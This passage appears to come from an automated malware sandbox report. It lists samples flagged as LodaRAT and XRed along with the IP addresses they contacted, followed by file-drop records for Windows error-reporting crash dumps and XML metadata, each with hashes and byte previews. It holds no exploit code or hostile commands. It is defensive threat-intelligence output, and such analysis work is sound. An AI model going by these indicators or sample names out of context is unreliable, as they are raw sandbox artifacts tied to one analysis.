                                                                                                                    LWQDFZ.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 142.250.185.193
                                                                                                                    • 172.217.16.206
                                                                                                                    JPS.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 142.250.185.193
                                                                                                                    • 172.217.16.206
                                                                                                                    KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 142.250.185.193
                                                                                                                    • 172.217.16.206
                                                                                                                    Machine-PO.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 142.250.185.193
                                                                                                                    • 172.217.16.206
                                                                                                                    AYRASY.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 142.250.185.193
                                                                                                                    • 172.217.16.206
                                                                                                                    222.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 142.250.185.193
                                                                                                                    • 172.217.16.206
                                                                                                                    Supplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 142.250.185.193
                                                                                                                    • 172.217.16.206
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    C:\ProgramData\Synaptics\RCX5CF5.tmpLWQDFZ.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):118
                                                                                                                      Entropy (8bit):3.5700810731231707
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                                                      MD5:573220372DA4ED487441611079B623CD
                                                                                                                      SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                                                      SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                                                      SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                                                      Malicious:false
                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):65536
                                                                                                                      Entropy (8bit):1.1338114451698205
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:M52VpsooImp0X8dv1DzJDzqjLOA/FczxwzuiFaZ24IO8EKDzy:NyPAX8dv1JqjkKzuiFaY4IO8zy
                                                                                                                      MD5:D0C9EA6C3FC94EF0C6B09CAEEC2A7D88
                                                                                                                      SHA1:0237F09E0AC50FAC0CBE0E59CEE8FC04A5ACEFD4
                                                                                                                      SHA-256:F5970F240FCCE3B161BAE1F4061DEC7CF9A04A10AB92175062817053CA10E014
                                                                                                                      SHA-512:172FEA65F3603BF4115CEBBC7D2E5E1CCD08C963CE7FB4D51B1C0C63CE2952739B67225520887E1A0F085F04AF535CB4D49437AF32699E5734E83640B3628499
                                                                                                                      Malicious:false
                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.0.2.8.4.7.7.4.8.1.8.8.7.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.0.2.8.4.7.9.0.4.4.3.9.3.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.0.2.9.5.5.5.0.-.d.4.8.a.-.4.3.c.5.-.8.0.6.3.-.7.d.e.2.4.d.3.8.6.0.e.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.8.a.c.b.a.f.7.-.b.a.5.4.-.4.3.b.f.-.9.e.8.4.-.c.1.8.8.f.d.a.2.5.3.2.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.6.4.-.0.0.0.1.-.0.0.1.4.-.d.5.8.5.-.5.3.6.2.a.6.5.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.e.2.f.4.7.6.0.1.f.c.a.d.6.2.1.8.3.9.3.7.5.6.7.2.1.0.b.5.0.6.2.b.0.7.5.0.f.a.7.0.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):65536
                                                                                                                      Entropy (8bit):1.1329813972324503
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:mlb2VpsG+oImp0WbkODzJDzqjLOA/FczxwzuiFaZ24IO8EKDzy:TyGpAWbkOJqjkKzuiFaY4IO8zy
                                                                                                                      MD5:DAF8BA4B38236A41071CD022371430E5
                                                                                                                      SHA1:3A196C7CDD98987DA438F084E1373C98B474ECDE
                                                                                                                      SHA-256:21A67A4D75623D91392F5F566CD65F42DEEA99B2220736CD002D101953A149C0
                                                                                                                      SHA-512:98E7DE95898D2CCC6B33B1914E6439AF59A75D013AB8DBC90DC6855F6065ACD33FECD51B939A1F874B19F996CCB0254084C88B2496A3013A5C7B87326A488A6B
                                                                                                                      Malicious:false
                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.0.2.8.4.8.0.3.4.0.8.3.6.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.0.2.8.4.8.0.8.2.5.2.1.3.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.4.d.3.e.a.5.9.-.3.1.4.f.-.4.a.4.b.-.9.7.9.8.-.8.1.e.0.7.d.2.d.f.5.1.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.7.8.4.4.4.e.e.-.8.1.a.1.-.4.7.1.1.-.9.e.a.5.-.6.3.4.8.5.1.3.3.1.2.7.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.6.4.-.0.0.0.1.-.0.0.1.4.-.d.5.8.5.-.5.3.6.2.a.6.5.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.e.2.f.4.7.6.0.1.f.c.a.d.6.2.1.8.3.9.3.7.5.6.7.2.1.0.b.5.0.6.2.b.0.7.5.0.f.a.7.0.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):65536
                                                                                                                      Entropy (8bit):1.1338388574686502
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:r42VpsMoIm10BU/3DzJDzqjLOA/FczxwzuiFaZ24IO8EKDzy:LyLsBU/3JqjkKzuiFaY4IO8zy
                                                                                                                      MD5:A03CFC68F0A7939F61BEEF12BC6BC80A
                                                                                                                      SHA1:968AC3DD76D9DD85C234A6AE3325CFEC5495821D
                                                                                                                      SHA-256:76B428CFE75FCD9170DED1E570D931CF0CAD04609FEDDBEA835F3FE395494973
                                                                                                                      SHA-512:E901BB89A978E8B62EA04CFECFA41F784AB8F920C4AF9478FC74255C598F7118E16E9A5DF4996083B3609158911E137C87D2161E746854459C997EE2F7EB8DD7
                                                                                                                      Malicious:false
                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.0.2.8.4.7.1.4.0.6.1.9.1.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.0.2.8.4.7.2.8.5.9.2.9.8.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.c.a.a.f.a.2.9.-.1.e.2.e.-.4.0.1.6.-.a.4.8.d.-.6.9.0.b.7.8.4.6.b.0.0.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.8.3.b.e.6.4.2.-.f.6.c.b.-.4.0.0.6.-.8.2.6.5.-.1.9.6.2.3.b.c.e.5.a.5.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.6.4.-.0.0.0.1.-.0.0.1.4.-.d.5.8.5.-.5.3.6.2.a.6.5.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.e.2.f.4.7.6.0.1.f.c.a.d.6.2.1.8.3.9.3.7.5.6.7.2.1.0.b.5.0.6.2.b.0.7.5.0.f.a.7.0.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:Mini DuMP crash report, 15 streams, Mon Dec 30 10:34:31 2024, 0x1205a4 type
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):391656
                                                                                                                      Entropy (8bit):2.1470576771307437
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:ihF9lvmoTX17tvUpdmbyHfWRVJB8mI7RyChtYRoUcbWfvv/3VI66KILjBP9y9OuM:irRaWD2l7XsbV69yozF
                                                                                                                      MD5:CE708C57F34BA6658C56D6F40A099C27
                                                                                                                      SHA1:FA8BA4BB65EBD2C021A54026DAC9A3FC63B04360
                                                                                                                      SHA-256:24CBF005178626F082F7FF02031C92E0E23E4A23EF47B2AB945FCFE55781A135
                                                                                                                      SHA-512:3395F1FB87050AAAC5C568A88BFECAA02B3B52C40E297561749539086C383719FFD1A7A7C255FD6E0FD11DAE85096DED07020F77320C827A7B8A461D8E7CBA59
                                                                                                                      Malicious:false
                                                                                                                      Preview:MDMP..a..... .......7wrg............................(.......$...............,...........`.......8...........T...........Hr...........................0..............................................................................eJ......x1......GenuineIntel............T.......d...+wrg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):6306
                                                                                                                      Entropy (8bit):3.7109025511231444
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:RSIU6o7wVetbAxl6uYiStQE/muK5aM4U8989bPJSsfy9pm:R6l7wVeJAxl6uYiSteprq89bxSsfybm
                                                                                                                      MD5:4F9606E68C3406D27555F76039A1AA56
                                                                                                                      SHA1:3BB41ECA2709A96D7DEE0026BCA7AABD7F7E414A
                                                                                                                      SHA-256:F6BF7477A0D8EA2BD0D1958ED0BA979CE51BB55557B595311327F9FF876F2DCC
                                                                                                                      SHA-512:F3C2E76AEB81391CA1338AB7FF73F2AB31385339993D6D310EA94A057734793F589EB882848FA04664FAD8AC5658BEFE53383D15A040AA4D6511C15BC3D10DF7
                                                                                                                      Malicious:false
                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.3.6.<./.P.i.
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):4572
                                                                                                                      Entropy (8bit):4.443313080847377
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:cvIwWl8zs0Jg77aI9yjRWpW8VYrYm8M4JFLF7+q84XoJZDwMdd:uIjfyI7oA7VjJnJoJZLdd
                                                                                                                      MD5:FD981BC95451CBE201EE2587A67B31DA
                                                                                                                      SHA1:038206EAE682D7C03397835B1BBAA73559DC1EF4
                                                                                                                      SHA-256:CF638DA3FFA9970081FE05AA1820092E31524EEDAF21984621C64B3601C8A509
                                                                                                                      SHA-512:148CA1D07EF7150AF4C0B1D4FE7E3F34F4A72A34A3B5C3ABC91032145B1A9C1C687D76D1CF7709E6A4FDAAE5BC91C1D968213320D75E5A5ABB5517C6F63C1CC9
                                                                                                                      Malicious:false
                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653857" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:Mini DuMP crash report, 15 streams, Mon Dec 30 10:34:37 2024, 0x1205a4 type
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):414098
                                                                                                                      Entropy (8bit):2.08370893284858
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:+8+BcBfmoTX17tvkUypkbyHfWRVJB8hGMd7Ry0DjYUMoUcT8evv/3VI664ILjBQy:+mhBD2/d71YJGjVR/vr8H
                                                                                                                      MD5:B2D2156ECAB514EE444D2D07C996FFC4
                                                                                                                      SHA1:5EC982F9FD28453772041C5F312FDFA77A501F69
                                                                                                                      SHA-256:222578E05669A9B08F1D2E4A74D6C7DF97FE3941A4CB235050EF9F2080AA068C
                                                                                                                      SHA-512:35F37097DCE5B43F27DC3499E4519BBFA27B200C67D4FACBD8A675D548F39AB64BB11301EAD7F10E1709853269CF5426C49CBB7EC3D538BC5D68DB981AD3F8C6
                                                                                                                      Malicious:false
                                                                                                                      Preview:MDMP..a..... .......=wrg....................................$...`/.......... ...........`.......8...........T........... r..r............/..........p1..............................................................................eJ.......2......GenuineIntel............T.......d...+wrg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):6292
                                                                                                                      Entropy (8bit):3.7108762913355804
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:RSIU6o7wVetbAxM6mYiSJTsuK5aMQUwq89bPzSsfj9rm:R6l7wVeJAxM6mYiSJTEpDT89brSsfjZm
                                                                                                                      MD5:F4AB5B400B5ED55A830B66FF9C9A736B
                                                                                                                      SHA1:1D6A815B45D4EE5FC8DBAA3E4DEBF4158886741E
                                                                                                                      SHA-256:C2BA3625D06B2EF9051D35C435D0D8642358E36EC231F53C68C8F2541382DB23
                                                                                                                      SHA-512:EE144D72E0F66B8211F7DDB30FEDAB5F092D8CA4079AA2BDA0158B1099A11304B6E8E39AA9112873EE457EE294266183027CB4583A5739D7CFFF4348718A98CB
                                                                                                                      Malicious:false
                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.3.6.<./.P.i.
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):4572
                                                                                                                      Entropy (8bit):4.443361402075512
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:cvIwWl8zs0Jg77aI9yjRWpW8VYnYm8M4JF9Fvx+q84FoJZDwMdd:uIjfyI7oA7VfJRxHoJZLdd
                                                                                                                      MD5:75B5E174D153EA571A9618A492B4B5B4
                                                                                                                      SHA1:C3D288F595665D8E115E1FDE9127C73E822751BD
                                                                                                                      SHA-256:91834677B7A61F5F804608FCD8EEE77C6F6074E6CDE9F0FB1C60854B89CD0883
                                                                                                                      SHA-512:A15FFD17B16EBF2087E636FA19202931F9B3D162DEFED3B65DE9B03449EE9627FABA622ED5FD2FD968AC432BEA406201F3A81B192135F49862CB61D96647A5C3
                                                                                                                      Malicious:false
                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653857" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:Mini DuMP crash report, 15 streams, CheckSum 0x00000004, Mon Dec 30 10:34:40 2024, 0x1205a4 type
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60372
                                                                                                                      Entropy (8bit):2.5976436936213
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:pR/l4v5APvovfBzM/SOq3HdzATaAayPrBI:D94veovfiaFAewPr+
                                                                                                                      MD5:E22C6770A6F5F9D44F2744FB1C59B2B6
                                                                                                                      SHA1:0745E7CA306B1165878B6BBF44861E137D7D3E25
                                                                                                                      SHA-256:A40B6816DDBEB47D0AEC3F54C1AEE7A8DD06BA6EEBE0EA523B9FEB7F77C22336
                                                                                                                      SHA-512:19AC884283D78E6E3FFC3CAE2123A3F249874D0827E075C2DEB724E3089594DF0280EF4FC562181F12814893F6B8D9CD7BCCBA52BE08930355867A23EFEFC6C9
                                                                                                                      Malicious:false
                                                                                                                      Preview:MDMP..a..... .......@wrg............4...............H.......$....&......$....5..........`.......8...........T............k...............'...........)..............................................................................eJ.......)......GenuineIntel............T.......d...+wrg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):6296
                                                                                                                      Entropy (8bit):3.6909153345773142
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:R6l7wVeJAx86cNuYiSJ8pD+89bUSsfbcm:R6lXJP6EuYh2URf1
                                                                                                                      MD5:65EBAD28917956912FCEB61EC920274F
                                                                                                                      SHA1:7010A8BEF3F4ECFBFDE6B95699D5E227100EFEE6
                                                                                                                      SHA-256:77DA7A799C3A50B2F22587C14F5641B61AB5CE5DC0943246DBAC595A759D5881
                                                                                                                      SHA-512:D94345E62EF47237CBA13C247CE21C3D49C162E620E70C537D105AAEF5E4166B54697D51546B35FA668A4BEDF4E3EF3CCDCAD3ED86E6F12EC4B56B687618AB75
                                                                                                                      Malicious:false
                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.3.6.<./.P.i.
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):4572
                                                                                                                      Entropy (8bit):4.442423102057424
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:cvIwWl8zs0Jg77aI9yjRWpW8VYwYm8M4JF9FY+q84FoJZDwMdd:uIjfyI7oA7VMJ+HoJZLdd
                                                                                                                      MD5:A29677981D202ED20E1E23887205C9C5
                                                                                                                      SHA1:A99A9F542C2F053E19830F83D9460A30496E640F
                                                                                                                      SHA-256:5B7BB353FFC0D7D29823CAE73CDD7C40BDC9609EB5C1A1176AD74A84B0B915A5
                                                                                                                      SHA-512:FA1FFC49C40850DFB9340142DA5294B6F38910FEE09ADAE74652A4506649A528AE1B65FEF2CAE8619EF59C991702200319A2755ED871DB60774286922DBEB182
                                                                                                                      Malicious:false
                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653857" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                      Process:C:\Users\user\Desktop\FGNEBI.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:modified
